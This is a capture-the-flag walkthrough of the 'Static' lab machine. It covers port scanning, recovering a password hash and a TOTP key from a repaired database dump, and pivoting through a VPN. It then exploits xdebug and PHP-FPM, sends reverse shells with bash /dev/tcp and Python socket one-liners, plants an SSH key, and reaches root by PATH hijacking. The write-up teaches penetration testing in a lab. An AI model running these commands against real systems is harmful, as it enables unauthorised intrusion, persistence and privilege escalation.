Static
Last updated
Was this helpful?
Last updated
Was this helpful?
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.246 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,2222,8080 10.10.10.246 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
The SSH services on ports 22, and 2222, look like are hosted in different systems. Could be different containers. Website on port 8080 shows an empty page. But nmap detected a robots.txt file with two entries.
The /.ftp_uploads/ directory has two files.
The warning.txt file says that some files might be corrupted.
The db.sql.gz file looks like a GZIP compressed file.
file db.sql.gz
But it looks like the file is corrupted.
gzip -d db.sql.gz
-d decompress file.
git clone https://github.com/yonjar/fixgz
cd fixgz/
gcc fixgz.cpp -o fixgz
Let's fix the corrupted file.
fixgz db.sql.gz db.sql.gz.fixed
Now, we could read its content with zcat.
zcat db.sql.gz.fixed
We get the password hash of the admin user. The password for that SHA1 hash is admin, as we can see in crackstation. Note that we also see a TOTP key, which might be valuable later.
On the other hand, the /vpn/ directory shows a login page, and the credentials that we found seem to be valid.
But, it asks for an OTP number, because 2FA is enabled.
I wrote the following script, which will give the correct OTP number, synchronizing the time, and using the TOTP key.
Now, we are able to log in.
python getToken.py
The website shows a list of servers with their IP addresses and their status.
If we enter something on the Common Name field, and press on Generate, we'll download a .ovpn file.
The VPN file won't work because it is trying to connect to vpn.static.htb.
openvpn test.ovpn
Let's add the domain name to the /etc/hosts file.
nano /etc/hosts
Now, we can connect to the VPN.
openvpn test.ovpn
Note that we have a new IP address on the interface tun9.
ip a
nano hosts
Now, scan those IP addresses through the tun9 interface.
bnmap.sh -f hosts -i tun9
-f scan networks and/or hosts in file.
-i scan interface.
As we can see, we don't have connection with the pub and pki server, the db server has an SQL service exposed, the web server has both SSH and HTTP exposed, and the vpn server has the same services as the main machine. Let's take a look at the website in the web server. First, to reach the container, add an ip route.
ip route add 172.20.0.10 dev tun9
The vpn/ directory shows the same login page saw earlier. And the info.php file shows the default PHP info page.
At some point, you'll see that the xdebug functionality is enabled.
There is a way to get Remote Command Execution in the machine using xdebug.
Let's execute the script with Python 2.
python2 exploit_shell.py
To trigger the exploit we'll have to make a GET request.
curl 172.20.0.10/info.php?XDEBUG_SESSION_START=alfa8sa
Now, we are able to execute commands on the system.
Let's get a reverse shell. First, set a netcat listener on port 4444.
nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
Now, send a reverse shell from the web server to our local machine, with the IP address of the VPN. We'll get the reverse shell as the www-data user, and we'll be able to grab the user flag.
system("bash -c 'bash -i >& /dev/tcp/172.30.0.9/4444 0>&1'")
To get a more comfortable shell, let's create a new pair of SSH keys on our local machine.
ssh-keygen
Copy the public key.
cat id_rsa.pub | xclip -sel clip
And put it in the authorized_keys of the www-data user.
echo "ssh-rsa AAAA...Nx/7E= root@alfa8sa" >> /home/www-data/.ssh/authorized_keys
Now, we are able to log into the machine through SSH without having to give any password.
ssh www-data@10.10.10.246 -p 2222
If we check the network interfaces, we'll see that the web server has two interfaces, apart from the local one.
ifconfig
And from this container we have connection with the pki server.
ping -c 1 192.168.254.3
-c number of ICMP packets.
Let's transfer with scp the bnmap.sh script to the web server, to be able to scan the pki server.
scp -P 2222 bnmap.sh www-data@10.10.10.246:/tmp/bnmap.sh
Now, give the script the right permissions, and scan the pki server.
chmod +x bnmap.sh
./bnmap.sh -p 192.168.254.3
Only port 80 is open. Let's exit the current SSH shell, and log in again, but doing port forwarding of port 80 of the pki server.
ssh www-data@10.10.10.246 -p 2222 -L 80:192.168.254.3:80
Now, we can access the HTTP server of the pki server by accessing port 80 on our local machine.
There is not much going on the website. But if we check the HTTP headers, we'll see that the website is running PHP-FPM/7.1.
curl http://127.0.0.1/index.php -I
python exploit.py --url http://127.0.0.1/index.php --verbose
Now, we are able to run commands on the system.
curl -s -G -X GET "http://127.0.0.1/index.php" --data-urlencode "a=/usr/bin/whoami" | awk "/' -/,/: cannot open/" | sed "s/' -//g" | grep -v cannot
scp -P 2222 ncat www-data@10.10.10.246:/tmp/ncat
Now, set a netcat listener on port 4444.
/tmp/ncat -lvnp 4444
I will run a one-liner reverse shell in python. Then, we'll catch a reverse shell from the pki server.
curl -s -G -X GET "http://127.0.0.1/index.php" --data-urlencode "a=/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
At this point, I started enumerating the machine looking for ways of becoming the root user, but I couldn't find anything until I listed the capabilities.
getcap / -r 2>/dev/null
-r enables recursive search.
There is one binary with the cap_setuid capability. Let's transfer pspy to the pki server, and execute the binary to see what it is doing. First, transfer it to the web server.
scp -P 2222 pspy64 www-data@10.10.10.246:/tmp/pspy
Now, log in again into the web server, and set a simple HTTP server on port 1234 with python in the /tmp directory.
ssh www-data@10.10.10.246 -p 2222
cd /tmp
python3 -m http.server 1234
As the pki machine doesn't have tools such as wget or curl to download pspy from the web server, we'll have to make our own curl function. Copy the following function, and paste it in the terminal.
Now, download pspy from the web server using the custom curl function.
__curl http://192.168.254.2:1234/pspy > pspy
chmod +x pspy
Now, if we run pspy, and then on another shell we run the ersatool binary.
ersatool
The tool looks like it's creating the VPN file we used at the begging of the machine. But, we can see with pspy, that the binary runs with the UID=0, which means that runs as root, and it is using relative paths with some commands.
We could exploit a path hijacking vulnerability to set the SUID permission to the /bin/bash binary. First, make a file called openssl in the /tmp directory with the following content, and give it execution permissions.
echo "chmod u+s /bin/bash" > /tmp/openssl
chmod +x /tmp/openssl
Now, modify the $PATH variable, so that the /tmp directory is the first one.
export PATH=/tmp:$PATH
Now, run the ersatool binary, and enter some random CN.
ersatool
Now, as the /tmp directory is the first one in the $PATH variable, the binary has executed the openssl script we made as root.
Finally, if we execute bash as root, all we have to do is reap the harvest and take the root flag.
bash -p
There is a tool called fixgz, which you can download from , which allow us to fix a corrupted .gz file.
Let's use the bnmap tool, which you can download from , to check for open ports on the hosts that we saw on the website. First, put the IP addresses of the other servers in the hosts file.
There is a python script, which you can download from , which exploits PHP-FPM, and allow us to execute commands on the system.
Time to get a shell. As we can only catch the reverse shell from the web server, we'll have to transfer the nc binary, which you can download from , to the web server.
